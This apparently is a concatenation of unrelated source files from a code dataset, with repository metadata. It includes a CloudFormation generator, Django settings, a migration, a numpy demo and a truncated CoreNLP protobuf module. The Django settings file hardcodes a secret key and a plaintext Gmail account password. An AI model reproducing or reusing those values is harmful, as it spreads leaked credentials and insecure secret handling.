ConstraintDescription="must be the name of an existing EC2 KeyPair.",
))
t.add_resource(ec2.SecurityGroup(
"SecurityGroup",
GroupDescription="Allow SSH and TCP/{} access".format(ApplicationPort),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol="tcp",
FromPort="22",
ToPort="22",
CidrIp=PublicCidrIp,
),
ec2.SecurityGroupRule(
IpProtocol="tcp",
FromPort=ApplicationPort,
ToPort=ApplicationPort,
CidrIp="0.0.0.0/0",
),
],
))
t.add_resource(ec2.Instance(
"instance",
ImageId="ami-a4c7edb2",
InstanceType="t2.micro",
SecurityGroups=[Ref("SecurityGroup")],
KeyName=Ref("KeyPair"),
UserData=ud,
))
t.add_output(Output(
"InstancePublicIp",
Description="Public IP of our instance.",
Value=GetAtt("instance", "PublicIp"),
))
t.add_output(Output(
"WebUrl",
Description="Application endpoint",
Value=Join("", [
"http://", GetAtt("instance", "PublicDnsName"),
":", ApplicationPort
]),
))
print(t.to_json())
| [
"escher00@yahoo.com"
] | escher00@yahoo.com |
15205ba55d76eb5bd6affa8f92d7501e5f2d30b2 | e40f1fbddf344e2b0addfd82b47cbc7590c34cd7 | /config/settings/local.py | 9bca4c920aa8fc37271052ec8e07d0bc6b5f074c | [
"MIT"
] | permissive | rchdlps/django-docker | 48ca4a6320c2f7735f6a9cb5271ad2dff62cca3e | 2c12732264c1f17cd62e20927b5956db498c30b7 | refs/heads/master | 2020-03-30T16:22:14.145387 | 2018-10-03T12:06:20 | 2018-10-03T12:06:20 | 151,405,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,096 | py | from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env('DJANGO_SECRET_KEY', default='NHA3a1maZNDntNQk40J0us7p4TGXDiRZZCKOLGvVYrRogC6g2imTmKOMbTgAJApc')
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [
"localhost",
"0.0.0.0",
"127.0.0.1",
]
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG # noqa F405
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.console.EmailBackend')
# https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
# https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 587
EMAIL_USE_TLS = True
EMAIL_HOST_USER = 'lopes.dexatec@gmail.com'
EMAIL_HOST_PASSWORD = 't5v5m2j2'
# django-debug-toolbar
# ------------------------------------------------------------------------------
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites
INSTALLED_APPS += ['debug_toolbar'] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware'] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2']
# django-extensions
# ------------------------------------------------------------------------------
# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration
INSTALLED_APPS += ['django_extensions'] # noqa F405
# Celery
# ------------------------------------------------------------------------------
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-always-eager
CELERY_TASK_ALWAYS_EAGER = True
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-eager-propagates
CELERY_TASK_EAGER_PROPAGATES = True
# Your stuff...
# ------------------------------------------------------------------------------
| [
"rchdlps@gmail.com"
] | rchdlps@gmail.com |
1c95e6322f01f2981b14f4584444c325432b8207 | 490ffe1023a601760ae7288e86723f0c6e366bba | /kolla-docker/patching/zun_compute_api/providerregion.py | 4dc91fc51a266902d9ef25f4c4c4b88fc506ef8c | [] | no_license | bopopescu/Cloud-User-Management | 89696a5ea5d2f95191327fbeab6c3e400bbfb2b8 | 390988bf4915a276c7bf8d96b62c3051c17d9e6e | refs/heads/master | 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null | UTF-8 | Python | false | false | 1,658 | py | def providerregion_update(self, context, container, *args):
if direct_action:
return self.manager.providerregion_update(context, container, *args)
else:
return self.rpcapi.providerregion_update(context, container, *args)
def providerregion_show(self, context, container, *args):
if direct_action:
return self.manager.providerregion_show(context, container)
else:
return self.rpcapi.providerregion_show(context, container)
def providerregion_create(self, context, new_providerregion, extra_spec,
requested_networks):
host_state = None
try:
host_state = {} # self._schedule_container(context, new_providerregion, extra_spec)
except Exception as exc:
# new_providerregion.status = consts.ERROR
# new_providerregion.status_reason = str(exc)
# new_providerregion.save(context)
return
if direct_action:
self.manager.providerregion_create(context, "", requested_networks, new_providerregion)
else:
self.rpcapi.providerregion_create(context, "", new_providerregion, "", requested_networks)
# self.rpcapi.providerregion_create(context, host_state['host'],
# new_providerregion, host_state['limits'],
# requested_networks)
def providerregion_delete(self, context, container, *args):
return self.manager.providerregion_delete(context, container, True)
# return self.rpcapi.providerregion_delete(context, container, *args)
| [
"Mr.Qinlichao@hotmail.com"
] | Mr.Qinlichao@hotmail.com |
7d30bdd38adf7e9f60ce553d4bff9fdca4b79980 | 5d986636a746aa8bab3b3412f15e66992a4d5c6e | /demos/week03_alfred/final_demo.py | ecb7715449fd04f953563443e52af19ffced16d6 | [] | no_license | DL-StudyGroup/deep_learning_from_scratch | 863444c2be1b4c426a42b0385f90f599c5c87860 | 561d4405b9a583f369639026376fb95133e2dc7e | refs/heads/master | 2020-04-08T23:36:32.282595 | 2019-05-12T09:12:03 | 2019-05-12T09:12:03 | 159,832,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def relu(x):
return np.maximum(0.0, x)
X = np.array([1.0, 0.5])
W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
B1 = np.array([0.1, 0.2, 0.3])
W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
B2 = np.array([0.1, 0.2])
W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
B3 = np.array([0.1, 0.2])
a1 = np.dot(X, W1) + B1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + B2
z2 = relu(a2)
y = z2 + B3
print("X:", X)
print("------------")
print("a1:", a1)
print("z1:", z1)
print("a2:", a2)
print("z2:", z2)
print("-------------")
print("the final y: ", y)
| [
"super.marrimo@gmail.com"
] | super.marrimo@gmail.com |
ea468b999d209aa5949f47fbf2a33213a78b306b | 4369c5a214f8c4fb1f8a286f72d57cfa9c3f02c7 | /geotrek/maintenance/migrations/0010_auto_20200228_1755.py | dfa45158e5acc1cee91f1e527738011a5ef40379 | [
"BSD-2-Clause"
] | permissive | GeotrekCE/Geotrek-admin | c13d251066e92359c26f22d185b8bd2e26e622ef | a91b75261a876be51ad2a693618629900bea6003 | refs/heads/master | 2023-08-21T12:45:25.586551 | 2023-08-09T12:28:33 | 2023-08-09T12:28:33 | 9,886,107 | 71 | 56 | BSD-2-Clause | 2023-09-13T09:40:33 | 2013-05-06T12:17:21 | Python | UTF-8 | Python | false | false | 1,121 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2020-02-28 16:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0009_auto_20200211_1011'),
]
operations = [
migrations.AlterField(
model_name='intervention',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='intervention',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AlterField(
model_name='project',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, verbose_name='Insertion date'),
),
migrations.AlterField(
model_name='project',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
| [
"gael.utard@makina-corpus.com"
] | gael.utard@makina-corpus.com |
a67fd9139f1b1a1a5f55555ccfc4ea911006371a | f1e98def25f88d17c328c07d4052cd6c34c27707 | /app/accounts/migrations/0002_alter_account_is_active.py | c7dd55e323cc76df4802b6c243d6f44f3d2b3d94 | [
"MIT"
] | permissive | iyanuashiri/exchange-api | c7f1fd2257c3369de9c0b7bea6806c602f25662e | 86f7a4e9fb17f71888e6854510618876d1010c19 | refs/heads/main | 2023-05-30T22:57:46.901693 | 2021-06-13T21:59:22 | 2021-06-13T21:59:22 | 376,542,066 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | # Generated by Django 3.2.4 on 2021-06-13 17:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='account',
name='is_active',
field=models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active'),
),
]
| [
"ajaoiyanu@gmail.com"
] | ajaoiyanu@gmail.com |
9685e8cfcd31ffd39a866a869baaa544acb5ec95 | 51cbdd33fd4480a920ee4e7a226f2e5ab8c59135 | /ex010.py | 37bc85729b645f2a46ef65a110cceeb011b73ce6 | [] | no_license | Prixribeiro/CursoPython | 6d9e6d74da795b5d9cc6e33811e4c727227b8633 | 61f4bc1d12243611197b84085f08f378ff1f97f1 | refs/heads/main | 2023-07-18T07:11:13.627425 | 2021-09-08T22:05:09 | 2021-09-08T22:05:09 | 404,506,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #Exercício Python 10: Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
rs = float(input('Digite o valor em Reais (R$) que deseja converter para dólares: '))
print('Com o valor de R$ {:.2f}, você obterá USD {:.2f}.'.format(rs, rs/5.32)) | [
"priscila.ribeiro@blueshift.com.br"
] | priscila.ribeiro@blueshift.com.br |
fe310f983b6714414978669e071340bb0e31060d | 1d6ee28b8f5a7e820b5b53a924fb611e99d39c9e | /third-party/stanza/stanza/nlp/CoreNLP_pb2.py | 483d71a011054f568487a422472e134ff8011531 | [
"Apache-2.0"
] | permissive | arunchaganty/django-corenlp | bb222c47fd2f02bd10b559fc52250ce8f2b5871f | 4cda142d375bdac84057cedc3d08b525b1e2d498 | refs/heads/master | 2020-05-21T18:06:34.616273 | 2016-10-01T18:50:46 | 2016-10-01T18:50:46 | 64,433,765 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | true | 124,473 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: CoreNLP.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='CoreNLP.proto',
package='edu.stanford.nlp.pipeline',
serialized_pb=_b('\n\rCoreNLP.proto\x12\x19\x65\x64u.stanford.nlp.pipeline\"\xea\x02\n\x08\x44ocument\x12\x0c\n\x04text\x18\x01 \x02(\t\x12\x35\n\x08sentence\x18\x02 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Sentence\x12\x39\n\ncorefChain\x18\x03 \x03(\x0b\x32%.edu.stanford.nlp.pipeline.CorefChain\x12\r\n\x05\x64ocID\x18\x04 \x01(\t\x12\x0f\n\x07\x64ocDate\x18\x07 \x01(\t\x12\x10\n\x08\x63\x61lendar\x18\x08 \x01(\x04\x12;\n\x11sentencelessToken\x18\x05 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Token\x12/\n\x05quote\x18\x06 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Quote\x12\x37\n\x08mentions\x18\t \x03(\x0b\x32%.edu.stanford.nlp.pipeline.NERMention*\x05\x08\x64\x10\x80\x02\"\xeb\x0b\n\x08Sentence\x12/\n\x05token\x18\x01 \x03(\x0b\x32 .edu.stanford.nlp.pipeline.Token\x12\x18\n\x10tokenOffsetBegin\x18\x02 \x02(\r\x12\x16\n\x0etokenOffsetEnd\x18\x03 \x02(\r\x12\x15\n\rsentenceIndex\x18\x04 \x01(\r\x12\x1c\n\x14\x63haracterOffsetBegin\x18\x05 \x01(\r\x12\x1a\n\x12\x63haracterOffsetEnd\x18\x06 \x01(\r\x12\x37\n\tparseTree\x18\x07 \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12@\n\x12\x62inarizedParseTree\x18\x1f \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12@\n\x12\x61nnotatedParseTree\x18 \x01(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\x11\n\tsentiment\x18! \x01(\t\x12=\n\x0fkBestParseTrees\x18\" \x03(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\x45\n\x11\x62\x61sicDependencies\x18\x08 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12I\n\x15\x63ollapsedDependencies\x18\t \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12T\n collapsedCCProcessedDependencies\x18\n \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12K\n\x17\x61lternativeDependencies\x18\r \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12?\n\x0copenieTriple\x18\x0e \x03(\x0b\x32).edu.stanford.nlp.pipeline.RelationTriple\x12<\n\tkbpTriple\x18\x10 \x03(\x0b\x32).edu.stanford.nlp.pipeline.RelationTriple\x12\x45\n\x10\x65ntailedSentence\x18\x0f \x03(\x0b\x32+.edu.stanford.nlp.pipeline.SentenceFragment\x12H\n\x14\x65nhancedDependencies\x18\x11 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12P\n\x1c\x65nhancedPlusPlusDependencies\x18\x12 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12\x11\n\tparagraph\x18\x0b \x01(\r\x12\x0c\n\x04text\x18\x0c \x01(\t\x12\x1e\n\x16hasRelationAnnotations\x18\x33 \x01(\x08\x12\x31\n\x06\x65ntity\x18\x34 \x03(\x0b\x32!.edu.stanford.nlp.pipeline.Entity\x12\x35\n\x08relation\x18\x35 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Relation\x12$\n\x1chasNumerizedTokensAnnotation\x18\x36 \x01(\x08\x12\x37\n\x08mentions\x18\x37 \x03(\x0b\x32%.edu.stanford.nlp.pipeline.NERMention\x12<\n\x10mentionsForCoref\x18\x38 \x03(\x0b\x32\".edu.stanford.nlp.pipeline.Mention\x12\"\n\x1ahasCorefMentionsAnnotation\x18\x39 \x01(\x08\x12\x12\n\nsentenceID\x18: \x01(\t*\x05\x08\x64\x10\x80\x02\"\xf4\x07\n\x05Token\x12\x0c\n\x04word\x18\x01 \x02(\t\x12\x0b\n\x03pos\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\x12\x10\n\x08\x63\x61tegory\x18\x04 \x01(\t\x12\x0e\n\x06\x62\x65\x66ore\x18\x05 \x01(\t\x12\r\n\x05\x61\x66ter\x18\x06 \x01(\t\x12\x14\n\x0coriginalText\x18\x07 \x01(\t\x12\x0b\n\x03ner\x18\x08 \x01(\t\x12\x15\n\rnormalizedNER\x18\t \x01(\t\x12\r\n\x05lemma\x18\n \x01(\t\x12\x11\n\tbeginChar\x18\x0b \x01(\r\x12\x0f\n\x07\x65ndChar\x18\x0c \x01(\r\x12\x11\n\tutterance\x18\r \x01(\r\x12\x0f\n\x07speaker\x18\x0e \x01(\t\x12\x12\n\nbeginIndex\x18\x0f \x01(\r\x12\x10\n\x08\x65ndIndex\x18\x10 \x01(\r\x12\x17\n\x0ftokenBeginIndex\x18\x11 \x01(\r\x12\x15\n\rtokenEndIndex\x18\x12 \x01(\r\x12\x34\n\ntimexValue\x18\x13 \x01(\x0b\x32 .edu.stanford.nlp.pipeline.Timex\x12\x15\n\rhasXmlContext\x18\x15 \x01(\x08\x12\x12\n\nxmlContext\x18\x16 \x03(\t\x12\x16\n\x0e\x63orefClusterID\x18\x17 \x01(\r\x12\x0e\n\x06\x61nswer\x18\x18 \x01(\t\x12\x15\n\rheadWordIndex\x18\x1a \x01(\r\x12\x35\n\x08operator\x18\x1b \x01(\x0b\x32#.edu.stanford.nlp.pipeline.Operator\x12\x35\n\x08polarity\x18\x1c \x01(\x0b\x32#.edu.stanford.nlp.pipeline.Polarity\x12-\n\x04span\x18\x1d \x01(\x0b\x32\x1f.edu.stanford.nlp.pipeline.Span\x12\x11\n\tsentiment\x18\x1e \x01(\t\x12\x16\n\x0equotationIndex\x18\x1f \x01(\x05\x12\x42\n\x0e\x63onllUFeatures\x18 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.MapStringString\x12\x11\n\tcoarseTag\x18! \x01(\t\x12\x38\n\x0f\x63onllUTokenSpan\x18\" \x01(\x0b\x32\x1f.edu.stanford.nlp.pipeline.Span\x12\x12\n\nconllUMisc\x18# \x01(\t\x12\x44\n\x13\x63onllUSecondaryDeps\x18$ \x01(\x0b\x32\'.edu.stanford.nlp.pipeline.MapIntString\x12\x17\n\x0fwikipediaEntity\x18% \x01(\t\x12\x0e\n\x06gender\x18\x33 \x01(\t\x12\x10\n\x08trueCase\x18\x34 \x01(\t\x12\x14\n\x0ctrueCaseText\x18\x35 \x01(\t*\x05\x08\x64\x10\x80\x02\"\xa1\x01\n\x05Quote\x12\x0c\n\x04text\x18\x01 \x01(\t\x12\r\n\x05\x62\x65gin\x18\x02 \x01(\r\x12\x0b\n\x03\x65nd\x18\x03 \x01(\r\x12\x15\n\rsentenceBegin\x18\x05 \x01(\r\x12\x13\n\x0bsentenceEnd\x18\x06 \x01(\r\x12\x12\n\ntokenBegin\x18\x07 \x01(\r\x12\x10\n\x08tokenEnd\x18\x08 \x01(\r\x12\r\n\x05\x64ocid\x18\t \x01(\t\x12\r\n\x05index\x18\n \x01(\r\"\xc7\x01\n\tParseTree\x12\x33\n\x05\x63hild\x18\x01 \x03(\x0b\x32$.edu.stanford.nlp.pipeline.ParseTree\x12\r\n\x05value\x18\x02 \x01(\t\x12\x17\n\x0fyieldBeginIndex\x18\x03 \x01(\r\x12\x15\n\ryieldEndIndex\x18\x04 \x01(\r\x12\r\n\x05score\x18\x05 \x01(\x01\x12\x37\n\tsentiment\x18\x06 \x01(\x0e\x32$.edu.stanford.nlp.pipeline.Sentiment\"\x96\x03\n\x0f\x44\x65pendencyGraph\x12=\n\x04node\x18\x01 \x03(\x0b\x32/.edu.stanford.nlp.pipeline.DependencyGraph.Node\x12=\n\x04\x65\x64ge\x18\x02 \x03(\x0b\x32/.edu.stanford.nlp.pipeline.DependencyGraph.Edge\x12\x10\n\x04root\x18\x03 \x03(\rB\x02\x10\x01\x1a\x44\n\x04Node\x12\x15\n\rsentenceIndex\x18\x01 \x02(\r\x12\r\n\x05index\x18\x02 \x02(\r\x12\x16\n\x0e\x63opyAnnotation\x18\x03 \x01(\r\x1a\xac\x01\n\x04\x45\x64ge\x12\x0e\n\x06source\x18\x01 \x02(\r\x12\x0e\n\x06target\x18\x02 \x02(\r\x12\x0b\n\x03\x64\x65p\x18\x03 \x01(\t\x12\x0f\n\x07isExtra\x18\x04 \x01(\x08\x12\x12\n\nsourceCopy\x18\x05 \x01(\r\x12\x12\n\ntargetCopy\x18\x06 \x01(\r\x12>\n\x08language\x18\x07 \x01(\x0e\x32#.edu.stanford.nlp.pipeline.Language:\x07Unknown\"\xc6\x02\n\nCorefChain\x12\x0f\n\x07\x63hainID\x18\x01 \x02(\x05\x12\x43\n\x07mention\x18\x02 \x03(\x0b\x32\x32.edu.stanford.nlp.pipeline.CorefChain.CorefMention\x12\x16\n\x0erepresentative\x18\x03 \x02(\r\x1a\xc9\x01\n\x0c\x43orefMention\x12\x11\n\tmentionID\x18\x01 \x01(\x05\x12\x13\n\x0bmentionType\x18\x02 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\t\x12\x0e\n\x06gender\x18\x04 \x01(\t\x12\x0f\n\x07\x61nimacy\x18\x05 \x01(\t\x12\x12\n\nbeginIndex\x18\x06 \x01(\r\x12\x10\n\x08\x65ndIndex\x18\x07 \x01(\r\x12\x11\n\theadIndex\x18\t \x01(\r\x12\x15\n\rsentenceIndex\x18\n \x01(\r\x12\x10\n\x08position\x18\x0b \x01(\r\"\xef\x08\n\x07Mention\x12\x11\n\tmentionID\x18\x01 \x01(\x05\x12\x13\n\x0bmentionType\x18\x02 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\t\x12\x0e\n\x06gender\x18\x04 \x01(\t\x12\x0f\n\x07\x61nimacy\x18\x05 \x01(\t\x12\x0e\n\x06person\x18\x06 \x01(\t\x12\x12\n\nstartIndex\x18\x07 \x01(\r\x12\x10\n\x08\x65ndIndex\x18\t \x01(\r\x12\x11\n\theadIndex\x18\n \x01(\r\x12\x12\n\nheadString\x18\x0b \x01(\t\x12\x11\n\tnerString\x18\x0c \x01(\t\x12\x13\n\x0boriginalRef\x18\r \x01(\r\x12\x1a\n\x12goldCorefClusterID\x18\x0e \x01(\x05\x12\x16\n\x0e\x63orefClusterID\x18\x0f \x01(\x05\x12\x12\n\nmentionNum\x18\x10 \x01(\r\x12\x0f\n\x07sentNum\x18\x11 \x01(\r\x12\r\n\x05utter\x18\x12 \x01(\r\x12\x11\n\tparagraph\x18\x13 \x01(\r\x12\x11\n\tisSubject\x18\x14 \x01(\x08\x12\x16\n\x0eisDirectObject\x18\x15 \x01(\x08\x12\x18\n\x10isIndirectObject\x18\x16 \x01(\x08\x12\x1b\n\x13isPrepositionObject\x18\x17 \x01(\x08\x12\x0f\n\x07hasTwin\x18\x18 \x01(\x08\x12\x0f\n\x07generic\x18\x19 \x01(\x08\x12\x13\n\x0bisSingleton\x18\x1a \x01(\x08\x12\x1a\n\x12hasBasicDependency\x18\x1b \x01(\x08\x12\x1d\n\x15hasEnhancedDepenedncy\x18\x1c \x01(\x08\x12\x1b\n\x13hasContextParseTree\x18\x1d \x01(\x08\x12?\n\x0fheadIndexedWord\x18\x1e \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12=\n\rdependingVerb\x18\x1f \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12\x38\n\x08headWord\x18 \x01(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12;\n\x0bspeakerInfo\x18! \x01(\x0b\x32&.edu.stanford.nlp.pipeline.SpeakerInfo\x12=\n\rsentenceWords\x18\x32 \x03(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12<\n\x0coriginalSpan\x18\x33 \x03(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12\x12\n\ndependents\x18\x34 \x03(\t\x12\x19\n\x11preprocessedTerms\x18\x35 \x03(\t\x12\x13\n\x0b\x61ppositions\x18\x36 \x03(\x05\x12\x1c\n\x14predicateNominatives\x18\x37 \x03(\x05\x12\x18\n\x10relativePronouns\x18\x38 \x03(\x05\x12\x13\n\x0blistMembers\x18\x39 \x03(\x05\x12\x15\n\rbelongToLists\x18: \x03(\x05\"X\n\x0bIndexedWord\x12\x13\n\x0bsentenceNum\x18\x01 \x01(\r\x12\x12\n\ntokenIndex\x18\x02 \x01(\r\x12\r\n\x05\x64ocID\x18\x03 \x01(\r\x12\x11\n\tcopyCount\x18\x04 \x01(\r\"4\n\x0bSpeakerInfo\x12\x13\n\x0bspeakerName\x18\x01 \x01(\t\x12\x10\n\x08mentions\x18\x02 \x03(\x05\"\"\n\x04Span\x12\r\n\x05\x62\x65gin\x18\x01 \x02(\r\x12\x0b\n\x03\x65nd\x18\x02 \x02(\r\"w\n\x05Timex\x12\r\n\x05value\x18\x01 \x01(\t\x12\x10\n\x08\x61ltValue\x18\x02 \x01(\t\x12\x0c\n\x04text\x18\x03 \x01(\t\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0b\n\x03tid\x18\x05 \x01(\t\x12\x12\n\nbeginPoint\x18\x06 \x01(\r\x12\x10\n\x08\x65ndPoint\x18\x07 \x01(\r\"\xdb\x01\n\x06\x45ntity\x12\x11\n\theadStart\x18\x06 \x01(\r\x12\x0f\n\x07headEnd\x18\x07 \x01(\r\x12\x13\n\x0bmentionType\x18\x08 \x01(\t\x12\x16\n\x0enormalizedName\x18\t \x01(\t\x12\x16\n\x0eheadTokenIndex\x18\n \x01(\r\x12\x0f\n\x07\x63orefID\x18\x0b \x01(\t\x12\x10\n\x08objectID\x18\x01 \x01(\t\x12\x13\n\x0b\x65xtentStart\x18\x02 \x01(\r\x12\x11\n\textentEnd\x18\x03 \x01(\r\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0f\n\x07subtype\x18\x05 \x01(\t\"\xb7\x01\n\x08Relation\x12\x0f\n\x07\x61rgName\x18\x06 \x03(\t\x12.\n\x03\x61rg\x18\x07 \x03(\x0b\x32!.edu.stanford.nlp.pipeline.Entity\x12\x11\n\tsignature\x18\x08 \x01(\t\x12\x10\n\x08objectID\x18\x01 \x01(\t\x12\x13\n\x0b\x65xtentStart\x18\x02 \x01(\r\x12\x11\n\textentEnd\x18\x03 \x01(\r\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0f\n\x07subtype\x18\x05 \x01(\t\"\xb2\x01\n\x08Operator\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x1b\n\x13quantifierSpanBegin\x18\x02 \x02(\x05\x12\x19\n\x11quantifierSpanEnd\x18\x03 \x02(\x05\x12\x18\n\x10subjectSpanBegin\x18\x04 \x02(\x05\x12\x16\n\x0esubjectSpanEnd\x18\x05 \x02(\x05\x12\x17\n\x0fobjectSpanBegin\x18\x06 \x02(\x05\x12\x15\n\robjectSpanEnd\x18\x07 \x02(\x05\"\xa9\x04\n\x08Polarity\x12K\n\x12projectEquivalence\x18\x01 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12Q\n\x18projectForwardEntailment\x18\x02 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12Q\n\x18projectReverseEntailment\x18\x03 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12H\n\x0fprojectNegation\x18\x04 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12K\n\x12projectAlternation\x18\x05 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12\x45\n\x0cprojectCover\x18\x06 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12L\n\x13projectIndependence\x18\x07 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\"\xf1\x01\n\nNERMention\x12\x15\n\rsentenceIndex\x18\x01 \x01(\r\x12%\n\x1dtokenStartInSentenceInclusive\x18\x02 \x02(\r\x12#\n\x1btokenEndInSentenceExclusive\x18\x03 \x02(\r\x12\x0b\n\x03ner\x18\x04 \x02(\t\x12\x15\n\rnormalizedNER\x18\x05 \x01(\t\x12\x12\n\nentityType\x18\x06 \x01(\t\x12/\n\x05timex\x18\x07 \x01(\x0b\x32 .edu.stanford.nlp.pipeline.Timex\x12\x17\n\x0fwikipediaEntity\x18\x08 \x01(\t\"Y\n\x10SentenceFragment\x12\x12\n\ntokenIndex\x18\x01 \x03(\r\x12\x0c\n\x04root\x18\x02 \x01(\r\x12\x14\n\x0c\x61ssumedTruth\x18\x03 \x01(\x08\x12\r\n\x05score\x18\x04 \x01(\x01\"\x9c\x02\n\x0eRelationTriple\x12\x0f\n\x07subject\x18\x01 \x01(\t\x12\x10\n\x08relation\x18\x02 \x01(\t\x12\x0e\n\x06object\x18\x03 \x01(\t\x12\x12\n\nconfidence\x18\x04 \x01(\x01\x12\x15\n\rsubjectTokens\x18\x05 \x03(\r\x12\x16\n\x0erelationTokens\x18\x06 \x03(\r\x12\x14\n\x0cobjectTokens\x18\x07 \x03(\r\x12\x38\n\x04tree\x18\x08 \x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12\x0e\n\x06istmod\x18\t \x01(\x08\x12\x10\n\x08prefixBe\x18\n \x01(\x08\x12\x10\n\x08suffixBe\x18\x0b \x01(\x08\x12\x10\n\x08suffixOf\x18\x0c \x01(\x08\"-\n\x0fMapStringString\x12\x0b\n\x03key\x18\x01 \x03(\t\x12\r\n\x05value\x18\x02 \x03(\t\"*\n\x0cMapIntString\x12\x0b\n\x03key\x18\x01 \x03(\r\x12\r\n\x05value\x18\x02 